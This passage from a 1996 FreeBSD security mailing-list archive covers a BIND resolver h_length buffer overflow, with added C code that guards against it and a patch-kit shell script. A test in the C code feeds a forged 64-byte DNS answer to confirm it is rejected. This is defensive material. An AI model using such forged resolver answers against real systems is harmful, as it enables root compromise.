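     * resolver h_length comes straight from the DNS reply. */
    if (hp->h_length != (int)sizeof(struct in_addr))
        return -1;

    memset(sin, 0, sizeof *sin);
    sin->sin_family = AF_INET;
    sin->sin_port = htons(port);
    memcpy(&sin->sin_addr, hp->h_addr_list[0], sizeof(struct in_addr));
    return 0;
}

/* Constructed hostent so the check runs offline; in real code the
 * structure comes from gethostbyname(). */
static char fake_name[] = "random-domain.com";

static void fill_hostent(struct hostent *hp, char **list, char *addr,
                         int length, int family)
{
    memset(hp, 0, sizeof *hp);
    hp->h_name = fake_name;
    hp->h_addrtype = family;
    hp->h_length = length;
    list[0] = addr;
    list[1] = NULL;
    hp->h_addr_list = list;
}

/* A normal 4-byte answer must be accepted and copied intact. */
int accepts_valid_answer(void)
{
    static unsigned char addr[4] = { 10, 1, 2, 3 };   /* constructed */
    char *list[2];
    struct hostent hp;
    struct sockaddr_in sin;

    fill_hostent(&hp, list, (char *)addr, (int)sizeof addr, AF_INET);
    if (hostent_to_sockaddr_in(&hp, 513, &sin) != 0)
        return 0;
    return memcmp(&sin.sin_addr, addr, sizeof addr) == 0
        && sin.sin_port == htons(513);
}

/* A forged answer claiming a 64-byte address must be refused before any
 * byte is copied; rcmd.c's bcopy() would have written all 64 bytes over
 * the 4-byte sin_addr and the stack beyond it. */
int rejects_oversized_answer(void)
{
    static unsigned char addr[64];                    /* constructed */
    char *list[2];
    struct hostent hp;
    struct sockaddr_in sin;

    memset(addr, 0x41, sizeof addr);
    fill_hostent(&hp, list, (char *)addr, (int)sizeof addr, AF_INET);
    return hostent_to_sockaddr_in(&hp, 513, &sin) == -1;
}

int main(void)
{
    printf("4-byte answer accepted:  %s\n", accepts_valid_answer() ? "yes" : "no");
    printf("64-byte answer rejected: %s\n", rejects_oversized_answer() ? "yes" : "no");
    return 0;
}
```

The same guard applies to every caller the advisory lists (traceroute, ping, the FWTK conn_server() routine): whatever gethostbyname() returns, copy exactly sizeof(struct in_addr) after checking h_addrtype and h_length, and treat a mismatch as a failed lookup.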
Take for instance traceroute, or ping, both of which fall prey to this problem. Aside from stock UN*X programs which ship with most vendor operating systems, there appear to be problems related to h_length in external software packages. Due to the flaw, FWTK (Firewall Toolkit), a freely available firewall kit, appears vulnerable. The generic routine, conn_server(), which is utilized by the proxy servers, appears to trust the data as well.

Vulnerable Systems
~~~~~~~~~~~~~~~~~~

At this point we would assume that most vendor systems who have incorporated BIND directly into their operating system are vulnerable. Solaris is not vulnerable, according to Casper Dik.

Fix Information
~~~~~~~~~~~~~~~

The maintainers of BIND, and CERT, were notified of this problem several months previous to this posting. We recommend upgrading to the latest release of BIND, which solves this problem due to the incorporation of IPv6 address support.

The latest official release of BIND is available at:

    ftp.vix.com in the directory /pub/bind/release/4.9.5

We wish to acknowledge and thank Theo de Raadt, the maintainer of the OpenBSD operating system, for his help in finding and analyzing this problem. More information on OpenBSD can be found at http://www.openbsd.org.

- Oliver Friedrichs

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJATn0AAAEEAJeGbZyoCw14fCoAMeBRKiZ3L6JMbd9f4BtwdtYTwD42/Uz1
A/4UiRJzRLGhARpt1J06NVQEKXQDbejxGIGzAGTcyqUCKH6yNAncqoep3+PKIQJd
Kd23buvbk7yUgyVlqQHDDsW0zMKdlSO7rYByT6zsW0Rv5JmHJh/bLKAOe7p9AAUR
tCVPbGl2ZXIgRnJpZWRyaWNocyA8b2xpdmVyQHNlY25ldC5jb20+iQCVAwUQMkBO
fR/bLKAOe7p9AQEBOAQAkTXiBzf4a31cYYDFmiLWgXq0amQ2lsamdrQohIMEDXe8
45SoGwBzXHVh+gnXCQF2zLxaucKLG3SXPIg+nJWhFczX2Fo97HqdtFmx0Y5IyMgU
qRgK/j8KyJRdVliM1IkX8rf3Bn+ha3xn0yrWlTZMF9nL7iVPBsmgyMOuXwZ7ZB8=
=xq4f
-----END PGP PUBLIC KEY BLOCK-----

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Oliver Friedrichs - (403) 262-9211 - Secure Networks Inc.
Suite 440, 703-6th Avenue S.W.
Calgary, AB, Canada, T2P 0T9

From owner-freebsd-security Tue Nov 19 14:50:42 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA12447 for security-outgoing; Tue, 19 Nov 1996 14:50:42 -0800 (PST)
Received: from dark.sinister.com (security@sinister.tiac.net [206.119.18.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA12426; Tue, 19 Nov 1996 14:50:34 -0800 (PST)
Received: from localhost (security@localhost) by dark.sinister.com (8.8.2/8.6.9) with SMTP id RAA15677; Tue, 19 Nov 1996 17:48:16 -0500
Date: Tue, 19 Nov 1996 17:48:11 -0500 (EST)
From: Security Officer
To: "S(pork)"
cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
Subject: Re: Serious BIND resolver problem. (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 19 Nov 1996, S(pork) wrote:

> From your friendly neighborhood paranoia victim comes yet another loaded
> question...
>
> I got this little advisory (thankfully without an exploit) today, and it's
> got me all worried. It's a problem in the whole gethostbyname call that
> allows (supposedly) local and remote users to gain root access using a
> variety of programs that rely on the gethostbyname call. So I downloaded
> BIND-4.9.3-REL which fixes all of this; and then I read the README in the

I think you want 4.9.5

>
> ---------- Forwarded message ----------
> Date: Mon, 18 Nov 1996 22:54:03 -0700
> From: Oliver Friedrichs > To: Multiple recipients of list BUGTRAQ > Subject: Serious BIND resolver problem. > > > We recommend upgrading to the latest release of BIND which solves this > problem due to the incorporation of IPv6 address support. > > The latest official release of BIND is availible at: > > ftp.vix.com in the directory /pub/bind/release/4.9.5 > > --Dr. Who System Administrator Sinister Networks From owner-freebsd-security Tue Nov 19 14:55:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA12744 for security-outgoing; Tue, 19 Nov 1996 14:55:28 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA12722; Tue, 19 Nov 1996 14:55:18 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id RAA02126; Tue, 19 Nov 1996 17:54:06 -0500 Date: Tue, 19 Nov 1996 16:54:05 -0600 (CST) 
From: "S(pork)" X-Sender: spork@super-g.inch.com To: Security Officer cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Whoops, yeah, 4.9.5; question still stands... sorry... Charles On Tue, 19 Nov 1996, Security Officer wrote: > > > On Tue, 19 Nov 1996, S(pork) wrote: > > > >From your friendly neighborhood paranoia victim comes yet another loaded > > question... > > > > I got this little advisory (thankfully without an exploit) today, and it's > > got me all worried. It's a problem in the whole gethostbyname call that > > allows (supposedly) local and remote users to gain root access using a > > variety of programs that rely on the gethostbyname call. So I downloaded > > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > > I think you want 4.9.5 > > > > > > ---------- Forwarded message ---------- > > Date: Mon, 18 Nov 1996 22:54:03 -0700 
> > From: Oliver Friedrichs > > To: Multiple recipients of list BUGTRAQ > > Subject: Serious BIND resolver problem. > > > > > > > > We recommend upgrading to the latest release of BIND which solves this > > problem due to the incorporation of IPv6 address support. > > > > The latest official release of BIND is availible at: > > > > ftp.vix.com in the directory /pub/bind/release/4.9.5 > > > > > > > --Dr. Who > > System Administrator > Sinister Networks > > > From owner-freebsd-security Tue Nov 19 15:30:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA15144 for security-outgoing; Tue, 19 Nov 1996 15:30:32 -0800 (PST) Received: from mail.vividnet.com (mail.vividnet.com [206.149.144.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA15137; Tue, 19 Nov 1996 15:30:20 -0800 (PST) Received: from taurus.vividnet.com (taurus.vividnet.com [206.149.144.6]) by mail.vividnet.com (8.8.3/8.8.3) with ESMTP id OAA21843; Tue, 19 Nov 1996 14:55:21 -0800 (PST) Received: from localhost (postmaster@taurus.vividnet.com) by taurus.vividnet.com (8.7.6/8.6.9) with SMTP id PAA03576; Tue, 19 Nov 1996 15:24:44 -0800 (PST) X-Authentication-Warning: taurus.vividnet.com: brian owned process doing -bs Date: Tue, 19 Nov 1996 15:24:44 -0800 (PST) 
From: Brian Wang To: "S(pork)" cc: freebsd-security@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Serious BIND resolver problem. (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 19 Nov 1996, S(pork) wrote: > >From your friendly neighborhood paranoia victim comes yet another loaded > question... > > I got this little advisory (thankfully without an exploit) today, and it's > got me all worried. It's a problem in the whole gethostbyname call that > allows (supposedly) local and remote users to gain root access using a > variety of programs that rely on the gethostbyname call. So I downloaded > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > BSD directory, got thoroughly confused, and posted my root password to > #hack on irc. (kidding). Now this does not appear to be a simple feat > (hence my posting to -questions and -security; security people can look at > it and laugh, and questions can tell me all about "diff-ing my source > tree" and "manually updating includes (which you may or may not have to > do)." So my question is this; could anyone who's already updated this > give me some advice or some pointers to this procedure?? The site > carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release > > Thanks All, > > Charles Charles, I think 4.9.5-REL over at ftp.vix.com/pub/bind/release/4.9.5 is what you are looking for, and as suggested by the advisory. I just updated our 2 name servers this morning, and all I did is make, and then make install. 
Sincerely, Brian From owner-freebsd-security Tue Nov 19 16:33:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA18817 for security-outgoing; Tue, 19 Nov 1996 16:33:11 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA18812; Tue, 19 Nov 1996 16:33:07 -0800 (PST) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.2/8.7.3) id LAA03928; Wed, 20 Nov 1996 11:02:23 +1030 (CST) 
From: Michael Smith
Message-Id: <199611200032.LAA03928@genesis.atrad.adelaide.edu.au>
Subject: Re: Futile rexecd holes
In-Reply-To: <199611191816.KAA06551@passer.osg.gov.bc.ca> from Cy Schubert - ITSD Open Systems Group at "Nov 19, 96 10:16:18 am"
To: cschuber@orca.gov.bc.ca
Date: Wed, 20 Nov 1996 11:02:22 +1030 (CST)
Cc: pst@shockwave.com, cschuber@orca.gov.bc.ca, security-officer@FreeBSD.org, freebsd-security@FreeBSD.org
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Cy Schubert - ITSD Open Systems Group stands accused of saying:
> This is the first I've heard of a "service pack update." What is a "service
> pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT
> (Program Update Tape)?

It sounds to me like a concept-in-progress.

> How does one get a "service pack update?"

I would say that if someone were to produce binary update kits for things like this, that people would be very happy. Basically you do something like this:

- Install your reference system (eg. 2.1.6).
- Make an MD5 listing of all the files in the system, save this as the "2.1.6 MD5 fingerprint".
- Patch your sources, make world, so now you have 2.1.6p1. Make another MD5 listing of all the files in the system, save this as the "2.1.6p1 fingerprint". Make a note of the checkout time of the tree you did your build from so that you can reproduce it later.
- Compare the two listings, produce a list of files that have changed between the two patchlevels. Separate the files based on their dist categories (bin, manpages, etc).
- Make tarballs of the changed files, advertise them as the "level 1 patchkit".
- Repeat the process when more changes appear. Don't be afraid to require that all kits be applied in order.
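The fingerprint, compare and tarball steps of that procedure, as an added example in POSIX shell that is not Mike's code or any FreeBSD tooling. It assumes md5sum (or BSD md5 -r) and a tar that accepts -T are on PATH, that file names contain no whitespace, and that a kit only needs to add and replace files (deleted files are not represented). The names fingerprint_tree, changed_files and build_patchkit are mine; splitting the changed list by dist category is left to the caller.

```shell
#!/bin/sh
# Added example, not Mike Smith's code: fingerprint an installed tree,
# diff it against an earlier fingerprint, and tar up what changed.
# Assumes md5sum (coreutils) or md5 -r (BSD) on PATH, a tar that takes
# -T, and file names without whitespace.

# fingerprint_tree DIR: print "hash path" for every regular file under
# DIR, sorted by path so two manifests can be compared line by line.
fingerprint_tree() {
    if command -v md5sum >/dev/null 2>&1; then
        hasher="md5sum"
    else
        hasher="md5 -r"
    fi
    ( cd "$1" && find . -type f | sort | while IFS= read -r f; do
        $hasher "$f"
    done )
}

# changed_files OLD_MANIFEST NEW_MANIFEST: paths whose hash differs
# between the manifests, plus paths present only in the new one.
changed_files() {
    awk 'NR == FNR { old[$2] = $1; next }
         !($2 in old) || old[$2] != $1 { print $2 }' "$1" "$2"
}

# build_patchkit OLD_MANIFEST NEW_TREE KIT: fingerprint NEW_TREE, write
# the files that changed since OLD_MANIFEST into the tar KIT, and print
# how many files went in (0 means no kit was written).
build_patchkit() {
    old_manifest=$1
    new_tree=$2
    kit=$3
    new_manifest=$(mktemp)
    changed=$(mktemp)
    fingerprint_tree "$new_tree" > "$new_manifest"
    changed_files "$old_manifest" "$new_manifest" > "$changed"
    if [ -s "$changed" ]; then
        tar -C "$new_tree" -cf "$kit" -T "$changed"
    fi
    count=$(wc -l < "$changed" | tr -d ' ')
    rm -f "$new_manifest" "$changed"
    echo "$count"
}
```

Typical use: run fingerprint_tree on the reference install and keep the output as the "2.1.6 MD5 fingerprint"; after the patched make world, build_patchkit "$fingerprint" / patchkit-1.tar produces the kit and reports how many files it holds. Keep the manifests under version control alongside the checkout time of the source tree, since they are what lets a later kit be reproduced.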
-- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Nov 19 16:38:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA19101 for security-outgoing; Tue, 19 Nov 1996 16:38:55 -0800 (PST) Received: from red.jnx.com (red.jnx.com [208.197.169.254]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA19096 for ; Tue, 19 Nov 1996 16:38:50 -0800 (PST) Received: from base.jnx.com (base.jnx.com [208.197.169.238]) by red.jnx.com (8.8.3/8.8.3) with ESMTP id QAA18266 for ; Tue, 19 Nov 1996 16:38:20 -0800 (PST) Received: (from pst@localhost) by base.jnx.com (8.7.6/8.7.3) id QAA01299; Tue, 19 Nov 1996 16:38:10 -0800 (PST) 
From: FreeBSD Security Officer
cc: freebsd-security@freebsd.org
Subject: Re: Serious BIND resolver problem. (fwd)
References:
Date: 19 Nov 1996 16:38:09 -0800
In-Reply-To: security@sinister.com's message of 19 Nov 96 22:48:11 GMT
Message-ID: <7ypw19iosu.fsf@base.jnx.com>
Lines: 9
X-Mailer: Gnus v5.2.25/XEmacs 19.14
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

The SNI advisory is for a problem that had been corrected quite some time ago. This is a "late" advisory causing lots of folks confusion.

The problem is in the resolver libraries (in libc). Upgrading named to 4.9.5 will not fix this problem. This problem was quietly fixed in 2.1 -stable and -current releases by explicit request of the author several months ago.

Paul

From owner-freebsd-security Tue Nov 19 17:15:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA21203 for security-outgoing; Tue, 19 Nov 1996 17:15:24 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA21172; Tue, 19 Nov 1996 17:15:15 -0800 (PST) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id RAA19552; Tue, 19 Nov 1996 17:13:56 -0800 (PST) Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA12392; Wed, 20 Nov 1996 12:13:33 +1100
From: Julian Assange Message-Id: <199611200113.MAA12392@suburbia.net> Subject: Re: Serious BIND resolver problem. (fwd) To: brian@mail.vividnet.com (Brian Wang) Date: Wed, 20 Nov 1996 12:13:33 +1100 (EST) Cc: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org In-Reply-To: from "Brian Wang" at Nov 19, 96 03:24:44 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > > > On Tue, 19 Nov 1996, S(pork) wrote: > > > >From your friendly neighborhood paranoia victim comes yet another loaded > > question... > > > > I got this little advisory (thankfully without an exploit) today, and it's > > got me all worried. It's a problem in the whole gethostbyname call that > > allows (supposedly) local and remote users to gain root access using a > > variety of programs that rely on the gethostbyname call. So I downloaded > > BIND-4.9.3-REL which fixes all of this; and then I read the README in the > > BSD directory, got thoroughly confused, and posted my root password to > > #hack on irc. (kidding). Now this does not appear to be a simple feat > > (hence my posting to -questions and -security; security people can look at > > it and laugh, and questions can tell me all about "diff-ing my source > > tree" and "manually updating includes (which you may or may not have to > > do)." So my question is this; could anyone who's already updated this > > give me some advice or some pointers to this procedure?? The site > > carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release > > > > Thanks All, > > > > Charles > > Charles, > > I think 4.9.5-REL over at ftp.vix.com/pub/bind/release/4.9.5 is > what you are looking for, and as suggested by the advisory. I just > updated our 2 name servers this morning, and all I did is make, and then > make install. > > Sincerely, > > Brian > it isn't the name servers you need to upgrade, it is the resolver libraries. 
-- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D | +---------------------+--------------------+----------------------------------+ From owner-freebsd-security Tue Nov 19 17:32:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA22466 for security-outgoing; Tue, 19 Nov 1996 17:32:05 -0800 (PST) Received: from ocean.campus.luth.se (ocean.campus.luth.se [130.240.194.116]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA22450 for ; Tue, 19 Nov 1996 17:32:02 -0800 (PST) Received: (from karpen@localhost) by ocean.campus.luth.se (8.7.5/8.7.3) id CAA23822; Wed, 20 Nov 1996 02:38:52 +0100 (MET) 
From: Mikael Karpberg
Message-Id: <199611200138.CAA23822@ocean.campus.luth.se>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: marcs@znep.com (Marc Slemko)
Date: Wed, 20 Nov 1996 02:38:52 +0100 (MET)
Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.ORG
In-Reply-To: from Marc Slemko at "Nov 18, 96 10:21:49 pm"
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

According to Marc Slemko:
> All arguments about just how much of a MTA needs to be setuid and why it
> can/can't be that way in real/fake life, do people think what phk suggests
> would be a useful thing, either as a separate patch or in the base kernel?
>
> It is trivial to implement; took 10 minutes to hack together a limited
> version (ie. uses names like net.inet.tcp.uidforport_25 because I didn't
> feel like creating a new level just for my hack and all the ports aren't
> implemented).

If it's trivial... Could someone take this suggestion seriously and simply implement it? Since nothing will happen unless you use it, it's safe as a default for compatibility, and it gives additional freedom for a more secure setup.

> The biggest problem I see to implementing such a thing is that I can't see
> a pretty way to make it fit into the sysctl mold without having 1024
> lines, one for each port < 1024. Anyone have any ideas on how to do that
> nicely or if 1024 lines is ok?

I think it's acceptable with 1024 lines. Really... If all ports default to root only, how many lines would you have? Do you use all ports < 1024? And many of those things run under inetd, which has to run as root anyway. You will probably never use more than a few lines.

> On Mon, 18 Nov 1996, Poul-Henning Kamp wrote:
[...]
> > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` [...] Just my $0.02 /Mikael From owner-freebsd-security Tue Nov 19 18:09:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA24187 for security-outgoing; Tue, 19 Nov 1996 18:09:13 -0800 (PST) Received: from sag.space.lockheed.com (sag.space.lockheed.com [192.68.162.134]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA24180 for ; Tue, 19 Nov 1996 18:09:00 -0800 (PST) Received: from localhost by sag.space.lockheed.com; (5.65v3.2/1.1.8.2/21Nov95-0423PM) id AA24914; Tue, 19 Nov 1996 18:08:59 -0800 Date: Tue, 19 Nov 1996 18:08:59 -0800 (PST) 
From: "Brian N. Handy" To: freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-Reply-To: <199611200032.LAA03928@genesis.atrad.adelaide.edu.au> Message-Id: X-Files: The truth is out there Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 20 Nov 1996, Michael Smith wrote: >Cy Schubert - ITSD Open Systems Group stands accused of saying: >> This is the first I've heard of a "service pack update." What is a "service >> pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT >> (Program Update Tape)? > >It sounds to me like a concept-in-progress. > >> How does one get a "service pack update?" > >I would say that if someone were to produce binary update kits for things >like this, that people would be very happy. Basically you do something like >this : Wow...this is scary. Someone makes a crack about Micro$oft's bug fix system, and suddenly we're implementing it? :-) Scared, very scared of the impending FreeBSD Service Pack I, Brian From owner-freebsd-security Tue Nov 19 18:14:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA24551 for security-outgoing; Tue, 19 Nov 1996 18:14:48 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA24536 for ; Tue, 19 Nov 1996 18:14:39 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id TAA04491; Tue, 19 Nov 1996 19:14:24 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id TAA07199; Tue, 19 Nov 1996 19:11:50 -0700 (MST) Date: Tue, 19 Nov 1996 19:11:50 -0700 (MST) 
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Mikael Karpberg
cc: phk@critter.tfs.com, freebsd-security@FreeBSD.ORG
Subject: binding to ports < 1024 (was: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).)
In-Reply-To: <199611200138.CAA23822@ocean.campus.luth.se>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 20 Nov 1996, Mikael Karpberg wrote:

> According to Marc Slemko:
>
> > The biggest problem I see to implementing such a thing is that I can't see
> > a pretty way to make it fit into the sysctl mold without having 1024
> > lines, one for each port < 1024. Anyone have any ideas on how to do that
> > nicely or if 1024 lines is ok?
>
> I think it's acceptable with 1024 lines. Really... If all ports default
> to root only, how many lines would you have? Do you use all ports < 1024?
> And many of those things run under inetd, which has to run as root
> anyway. You will probably never use more than a few lines.

The problem is that the output of a sysctl -a will be very bloated. If you could make the variable only appear when changed from the default it would be a different matter, but I don't think that is practical. The way current sysctl variables are done, it also means several thousand more lines of source, since each option needs a separate define, etc. It would also add somewhere between 2k and 40k to the compiled kernel if implemented the dumb way; I think that is a significant amount for something with such limited use. It could easily be hidden behind an ifdef I guess.

Oh, and one other thing I missed is that it should be under net.inet.ip (perhaps; it doesn't quite fit in at that level though) and not tcp because it applies to both tcp and udp.

> > > On Mon, 18 Nov 1996, Poul-Henning Kamp wrote:
> [...]
> > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > > > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > > > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > > > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` > [...] > > Just my $0.02 > /Mikael > From owner-freebsd-security Tue Nov 19 23:42:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA11537 for security-outgoing; Tue, 19 Nov 1996 23:42:49 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA11531 for ; Tue, 19 Nov 1996 23:42:46 -0800 (PST) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id XAA25718; Tue, 19 Nov 1996 23:42:47 -0800 (PST) Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id SAA04136; Wed, 20 Nov 1996 18:42:26 +1100 
From: Julian Assange Message-Id: <199611200742.SAA04136@suburbia.net> Subject: Re: binding to ports < 1024 (was: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).) To: marcs@znep.com (Marc Slemko) Date: Wed, 20 Nov 1996 18:42:25 +1100 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Marc Slemko" at Nov 19, 96 07:11:50 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > The problem is that the output of a sysctl -a will be very bloated. If > you could make the variable only appear when changed from the default it > would be a different matter, but I don't think that is practical. The way > current sysctl variables are done, it also means several thousand more > lines of source, since each option needs a seperate define, etc. It would > also add somewhere between 2k and 40k to the compiled kernel if > implemented the dumb way; I think that is a significant amount for > something with such limited use. It could easily be hidden behind an > ifdef I guess. This can performed as a linked list of affected ranges. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. 
Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D | +---------------------+--------------------+----------------------------------+ From owner-freebsd-security Wed Nov 20 01:13:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA17520 for security-outgoing; Wed, 20 Nov 1996 01:13:36 -0800 (PST) Received: from panoramix.rain.fr (panoramix.rain.fr [194.51.3.136]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA17513; Wed, 20 Nov 1996 01:13:29 -0800 (PST) Received: from panoramix.rain.fr (localhost [127.0.0.1]) by panoramix.rain.fr (8.8.3/8.8.3) with SMTP id KAA25586; Wed, 20 Nov 1996 10:19:40 +0100 (MET) Message-ID: <3292CD2C.41C67EA6@panoramix.rain.fr> Date: Wed, 20 Nov 1996 09:19:40 +0000 
From: Tom Fischer
X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 2.1.0-RELEASE i386)
MIME-Version: 1.0
To: FreeBSD Security Officer
CC: freebsd-security@freebsd.org
Subject: Re: Serious BIND resolver problem. (fwd)
References: <7ypw19iosu.fsf@base.jnx.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello,

"quietly fixed?" I'm not too sure I like the sound of that. I'm running 2.1.0-Release, installed off the January 1996 cdrom on several systems. I've installed all of the patches, etc., that were available on ftp://freebsd.org/pub/CERT/patches, and I don't remember anything about this problem (apparently, obviously).

My question is: Do I need to do something to my libc library? As I understand it, 2.1R from the cd is not the same thing as 2.1 -stable... or am I wrong?

thanks,
tom
tfischer@rain.fr
=====================================================

FreeBSD Security Officer wrote:
>
> The SNI advisory is for a problem that had been corrected quite some time ago.
> This is a "late" advisory causing lots of folks confusion.
>
> The problem is in the resolver libraries (in libc). Upgrading named to 4.9.5
> will not fix this problem. This problem was quietly fixed in 2.1 -stable and
> -current releases by explicit request of the author several months ago.
